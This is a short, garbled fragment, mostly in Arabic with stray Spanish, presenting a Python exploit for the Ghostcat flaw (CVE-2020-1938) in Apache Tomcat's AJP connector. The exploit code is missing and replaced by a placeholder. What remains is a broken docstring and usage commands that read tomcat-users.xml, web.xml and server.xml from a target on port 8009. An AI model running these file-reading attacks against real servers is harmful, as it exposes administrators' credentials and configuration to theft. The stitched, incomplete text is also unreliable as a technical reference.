
استغلال بلغة بايثون لثغرة CVE-2020-1938 (Ghostcat) يقرأ ملفات عشوائية من خوادم Apache Tomcat عبر موصل AJP على المنفذ 8009، بما في ذلك ملفات الإعدادات وبيانات الاعتماد.
Ghostcat - استغلال CVE-2020-1938 يقرأ ملفات Tomcat عبر موصل AJP (المنفذ 8009) الاستخدام: python3 ghostcat.py [archivo] """
cat > ghostcat.py << 'PYEOF' [هنا يوضع الكود الكامل أعلاه] PYEOF
chmod +x ghostcat.py
python3 ghostcat.py ejemplo.com conf/tomcat-users.xml 8009
python3 ghostcat.py ejemplo.com WEB-INF/web.xml 8009
python3 ghostcat.py ejemplo.com conf/server.xml 8009